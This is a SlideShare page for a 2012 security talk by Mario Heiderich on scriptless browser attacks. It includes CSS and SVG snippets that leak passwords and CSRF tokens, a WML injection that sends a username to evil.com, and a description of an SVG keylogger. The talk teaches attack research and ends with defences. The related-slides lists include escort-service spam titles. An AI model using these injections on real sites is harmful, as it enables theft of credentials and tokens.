SlideShare une entreprise Scribd logo

MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen

MMT - Multimediatreff
MMT - Multimediatreff

Schon wieder einer dieser Cross-Site-Scripting-Talks? Mitnichten! Manipulationen oder Datenklau via JavaScript steht heutzutage stark im Fokus und so werden ständig neue Schutzwälle dagegen entwickelt und eingesetzt. Man nutzt Eingabefilter, Sandboxes, usw. Ganz Sicherheitsbewusste schalten JavaScript gleich vollständig ab. Was jedoch wäre, wenn auch das nicht vollständig schützt? Wenn es Angriffstechniken gäbe, welche ganz und gar ohne Scripting auskommen? OK, warm anziehen, denn der Hacker Mario Heiderich zeigt Euch, dass es sie gibt!

TechnologieArt & Photos
1  sur  52
Télécharger pour lire hors ligne
(GOT YOUR NOSE) (How Attackers steal your precious Data without using Scripts) A Presentation by Mario Heiderich, 2012 (got your nose)
(Our Dear Speaker)  Mario Heiderich  Researcher and PhD Student, Ruhr-Uni Bochum  PhD Thesis on Client Side Security and Defense  Security Researcher contracting for MS, Redmond  Security Researcher for SRLabs & Deutsche Post  Published author and international speaker  Specialized in HTML5 and SVG Security  JavaScript, XSS and Client Side Attacks  FUD Peddler and Prophet of Doom  HTML5 Security Cheatsheet (got your nose)
(Background) (got your nose)
(CrosS) (Site Scripting)  Lots of Talks have been held  Plenty of Research has been done  Traditional injections  Attacks from outer space  XSS, XAS, XDS, XSSQLI, SWXSS, … you name it!  Defense mechanisms on multiple layers  Network, Server, Client and what not...  CSP, NoScript, AntiSamy and HTMLPurifier, Browser XSS Filters  mod_security, PHPIDS, some nonsense WAF products  But why use scripting at all? (got your nose)
(Topics TODAY)  Scriptless Attacks in your Browser  Attacks bypassing NoScript  Attacks bypassing Content Security Policy  No Scripting allowed  No Scripting necessary  Attacks working in Thunderbird  Attacks stealing your data without XSS (got your nose)
(Offensive Talk)  We'll mainly see attack vectors today  Starting simple – using cheap HTTP tricks  Stealing passwords with CSS  Almost like the Sexy Assassin back in 2009  Just without any bruteforcing  Playing with a user's perception  Time and Measure, Log and Steal  Focus is stealing data by using the browser  Passwords, tokens, sensitive data is general (got your nose)
(The ) (Markup Brothers) (SVG Sanchez) (HTML Harry) (Clive S Stylesheet) (got your nose)
(A river for some) (got your nose)
(Defense)  Defense is possible but tough  Benign features combined to be attacks  No possibility to easily build signatures  Attacker utilizes solicited content  CSS, SVG images, Links and Images  No scripting allowed!  „Thanks for the injection!“ (got your nose)
(Happy Injections) (got your nose)
(Exploits)  Three Chapters to be presented  Chapter 1: The simple tricks  Chapter 2: Advanced Class  Chapter 3: For Science! (got your nose)
(Chapter one) < Those simple Tricks > (got your nose)
(Alice and the captcha)  Let's asume the following situation  Alice visits a website she frequently uses  She has a login there, password stored  Let's further assume her password is „secret“  The site seems to have a new security feature!  Now the login needs a CAPTCHA to be solved  And that is how it looks like! (got your nose)
(CAPCTHA Of doom)  Seems legit?  See it live: http://heideri.ch/opera/captcha/ (got your nose)
(analysis)  What really happens  The attacker, Clive, injects CSS...  input[type=password]{content:attr(value)}  Then he includes a custom SVG font  @font-face {font-family: X;src: url(x.svg#X) format("svg");}  The attacker simply flips characters  s becomes x, e becomes w, c becomes @ …  By thinking it's a CAPTCHA...  … Alice submits her password to the attacker (got your nose)
(validation) (got your nose)
(css and regex)  Old but gold – brute-forcing passwords  But this time with CSS3 and HTML5  The secret ingredient here is „validation“  Brute-force with RegEx!  Let's have a look  DEMO  Good thing it works on all browsers  Limited by smart password managers though (got your nose)
(Chapter TWO) < Advanced Class > (got your nose)
(I read you)  Bob is security aware  His online banking webite? No scripts allowed!  His browser? Top-up-to-date!  His emails? PGP SMIME – you name it! ,  Bob isolates stuff, knows his security  Even if an attacker XSS'd his bank website...  Nothing could happen – no JavaScript, Flash or Java  How can we still pwn Bob then? (got your nose)
(smart bob) (got your nose)
(define goals)  We cannot XSS Bob  We cannot easily get his cookies  Neither simply access sensitive data  But we want his login data  So we oughta „jack“ the login form! (got your nose)
(WAP Injection)  If Bob used Opera, we'd have a nice lever (got your nose)
(Legit or not)  Looked legit – or did it?  So what happened here?  Opera allows WAP/WML injections  Thereby we can use WML variables  <go href="//evil.com"><postfield name="stolen" value="$(username)"/>  Limited though – XHTML only, Opera only  Let's have a look: http://html5sec.org/login (got your nose)
(Lucky bob)  He uses Firefox with NoScript  ...and Thunderbird with Enigmail  Unpwnable? (got your nose)
Rebuttal  Let's stay admantine  And develop a targeted exploit  Working on Firefox and Thunderbird  Latest versions, bypassing NoScript How can we do that?  And can we do it at all?  Let's have a look! (got your nose)
(keylogger)  Just a harmless login page  Behaving strange on closer inspection though...  Let's check that http://html5sec.org/keylogger (got your nose)
(Leaving las vegas)  If it works in Firefox w/o JavaScript  Can it also work in... (got your nose)
(thunderbird)  Mother of God!  Stealing and exfiltrating keystrokes  Right in your favorite email client  Demo time! (got your nose)
(How is it done)  Attacker injected some inline SVG code  SVG knows the <set> element  The <set> element can listen to events  Even keystrokes  The feature is called accessKey() (W3C)  JavaScript is turned off – it's „no script“ anyway  But the keystroke scope is hard to define  In Firefox it's the whole document (got your nose)
(thanks svg sanchez) Now, what's next? (got your nose)
<lets take a breath> (got your nose)
(Chapter three) < For Science!!! > (got your nose)
(CSRF Tokens)  Everybody knows CSRF  One domain makes a request to another  The user is logged into that other domain  Stuff happens, accounts get modified etc.  How to we kill CSRF?  Easily – we use tokens, nonces  We make sure a request cannot be guessed  Or brute-forced – good tokens are long and safe (got your nose)
CSRF and XSS  CSRF and XSS are good friends  JavaScript can read tokens from the DOM  Bypass most CSRF protection techniques  But can we steal CSRF tokens w/o JS? (got your nose)
(Already done)  SDC, Gaz and thornmaker already did it  Check out http://p42.us/css/  They used CSS  Basically a brute-force via attribute selectors  input[value^=a]{background:url(?a)}  If the server catches GET /?a...  The first character is an a  But then what?  There's no „second or Nth character selector“  They had to go input[value^=aa]{background:url(?aa)} (got your nose)
(effectiveness)  We're attackers who don't have much time!  So we cannot bruteforce like that  We need a quicker approach!  Also, this time we want to attack Webkit :-)  Let's cook ourselves some crazy CSS! (got your nose)
(ingredients)  Some links with a secret CSRF token  A CSS injection  height  width  content:attr(href)  overflow-x:none  font-family  And another secret ingredient (got your nose)
(DEMO)  http://html5sec.org/webkit/test (got your nose)
(cooking meth)  The secret ingredients  Custom SVG font – one per character  An animation – decreasing the box size  The overflow to control scrollbar appearance  And finally...  Styled scrollbar elements – Webkit only div.s::-webkit-scrollbar-track-piece :vertical:increment {background:red url(/s)} (got your nose)
(those fonts)  There's more we can do with custom fonts  HTML5 recommends WOFF  All done via @font-face  WOFF supports an interesting feature  Discretionary Ligatures  Arbitrary character sequences can become one character  Imagine.. C a t become a cat icon. Or... d e e r a lil' deer (got your nose)
(ligatures)  http://ie.microsoft.com/testdrive/graphics/opentype/opentype-monotype/index.html (got your nose)
(fontforge) (got your nose)
(Attack fonts)  We can thus build dictionary fonts!  One character per password for example  No problem for a font to handle 100k+ items  Map the string s u p e r s e c r e t into one char  Make everything else invisible  If the character is visible, we have a hit  If not the password is not in the list/font  But how to activate this ligature feature?  With CSS3! -moz-font-feature-settings:'calt=0'; -ms-font-feature- settings:'calt' 0;  How can we find out if nothing – or just one char is visible? (got your nose)
(go CSS)  Remember the smart scrollbars?  Same thing all over again  But this time for all browsers please  CSS Media Queries to the rescue!  We can deploy selective CSS depending on:  Viewport width, viewport height  @media screen and (max-width: 400px){*{foo:bar}}  Every character gets a distinct width, and/or height  Once scrollbars appear, the viewport width gets reduced  By the width of the scrollbar  Some Iframe tricks do the job and allow universal scrollbar detection  That's all we need _:D (got your nose)
{Demo} DEMO (got your nose)
(the perfect leak) (got your nose)
{Almost done} (got your nose)
(CONCLUSION I) Everything is a side-channel nowadays (Oh my!) (got your nose)
(Conclusion II)  Scriptless Attacks versus XSS  Not many differences in impact  More common injcetion scenarios  Affecting sandboxes with HTML5  Information leaks by design  Hard to detect and fix  Timing and Side-Channel  NoScript to the rescue! (got your nose)
(defense)  How to protect against features?  How to protect against side-channels  Reduce data leakage?  Change standards?  Build better sandboxes?  Extend SOP to images and other side channels,  Use CSP?  XFO and Framebusters ftw?  Use NoScript if you can! (got your nose)
(Future work)  There's a lot more in this  CSRF, injections and side-channels  Challenging attacker creativity  Application and App specific bugs  Scriptless attacks and mobile devices?  Exciting times to come without XSS (got your nose)
(The end)  Questions?  Discussion?  Beer? (got your nose)

Recommandé

Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
Password Storage and Attacking in PHP
Password Storage and Attacking in PHPPassword Storage and Attacking in PHP
Password Storage and Attacking in PHPAnthony Ferrara
 
Passwords
PasswordsPasswords
PasswordsCharles Southerland
 
Password Storage And Attacking In PHP - PHP Argentina
Password Storage And Attacking In PHP - PHP ArgentinaPassword Storage And Attacking In PHP - PHP Argentina
Password Storage And Attacking In PHP - PHP ArgentinaAnthony Ferrara
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 

Recommandé

Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
Password Storage and Attacking in PHP
Password Storage and Attacking in PHPPassword Storage and Attacking in PHP
Password Storage and Attacking in PHPAnthony Ferrara
 
Passwords
PasswordsPasswords
PasswordsCharles Southerland
 
Password Storage And Attacking In PHP - PHP Argentina
Password Storage And Attacking In PHP - PHP ArgentinaPassword Storage And Attacking In PHP - PHP Argentina
Password Storage And Attacking In PHP - PHP ArgentinaAnthony Ferrara
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITYSupanShah2
 
Password Security
Password SecurityPassword Security
Password SecurityAlex Hyer
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Porting Java To Scala
Porting Java To Scala Porting Java To Scala
Porting Java To Scala guestbfe8bf
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Passwords presentation
Passwords presentationPasswords presentation
Passwords presentationGreg MacPherson
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Symbol GC
Symbol GCSymbol GC
Symbol GCNarihiro Nakamura
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...Brian Campbell
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...Area41
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
P@ssw0rds
P@ssw0rdsP@ssw0rds
P@ssw0rdsWill Alexander
 
Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"NodeUkraine
 
Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Berlin Office
 
MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«MMT - Multimediatreff
 

Contenu connexe

Tendances

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITYSupanShah2
 
Password Security
Password SecurityPassword Security
Password SecurityAlex Hyer
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Porting Java To Scala
Porting Java To Scala Porting Java To Scala
Porting Java To Scala guestbfe8bf
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
Password Security
Password SecurityPassword Security
Password SecurityCSCJournals
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Krzysztof Kotowicz
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...Brian Campbell
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...Area41
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"NodeUkraine
 

Tendances (20)

The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITY
 
Password Security
Password SecurityPassword Security
Password Security
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)security
 
Porting Java To Scala
Porting Java To Scala Porting Java To Scala
Porting Java To Scala
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Password Security
Password SecurityPassword Security
Password Security
 
Passwords presentation
Passwords presentationPasswords presentation
Passwords presentation
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Symbol GC
Symbol GCSymbol GC
Symbol GC
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
An Introduction to the Emerging JSON-Based Identity and Security Protocols (O...
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
P@ssw0rds
P@ssw0rdsP@ssw0rds
P@ssw0rds
 
Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"Roman Sachenko "NodeJS Security or Blackened is The End"
Roman Sachenko "NodeJS Security or Blackened is The End"
 

En vedette

Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Berlin Office
 
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIsMMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIsMMT - Multimediatreff
 
MMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s CutMMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s CutMMT - Multimediatreff
 
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...MMT - Multimediatreff
 

En vedette (6)

Mit Fragen führen im Workshop
Mit Fragen führen im Workshop Mit Fragen führen im Workshop
Mit Fragen führen im Workshop
 
MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«MMT 28: Adobe »Edge to the Flash«
MMT 28: Adobe »Edge to the Flash«
 
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIsMMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
MMT 30: Windows Phone 7 – Architektur, Frameworks & APIs
 
MMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s CutMMT 30: Windows Phone Director’s Cut
MMT 30: Windows Phone Director’s Cut
 
MMT 30: Der Weg in den Marketplace
MMT 30: Der Weg in den MarketplaceMMT 30: Der Weg in den Marketplace
MMT 30: Der Weg in den Marketplace
 
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
MMT 27: »Ja, aber wie genau geht das nun?« – Warum Social Media Alltag geler...
 

Similaire à MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen

[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
 
Jassa la GeekMeet Bucuresti
Jassa la GeekMeet BucurestiJassa la GeekMeet Bucuresti
Jassa la GeekMeet Bucurestialexnovac
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines José Ignacio
 
XSS Without Browser
XSS Without BrowserXSS Without Browser
XSS Without Browserkosborn
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)johnwilander
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsMo Jangda
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksJuho Vepsäläinen
 
Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011Ilya Grigorik
 
Typescript overview
Typescript overviewTypescript overview
Typescript overviewcodeblock
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year laterGiovanni Bechis
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Saumil Shah
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 

Similaire à MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen Daten kommen (20)

[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
Jassa la GeekMeet Bucuresti
Jassa la GeekMeet BucurestiJassa la GeekMeet Bucuresti
Jassa la GeekMeet Bucuresti
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
Bypassing Web Application Firewalls
Bypassing Web Application FirewallsBypassing Web Application Firewalls
Bypassing Web Application Firewalls
 
XSS Without Browser
XSS Without BrowserXSS Without Browser
XSS Without Browser
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and Tricks
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011Ruby in the Browser - RubyConf 2011
Ruby in the Browser - RubyConf 2011
 
Typescript overview
Typescript overviewTypescript overview
Typescript overview
 
LibreSSL, one year later
LibreSSL, one year laterLibreSSL, one year later
LibreSSL, one year later
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
 
Offensive MitM
Offensive MitMOffensive MitM
Offensive MitM
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 

Dernier

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
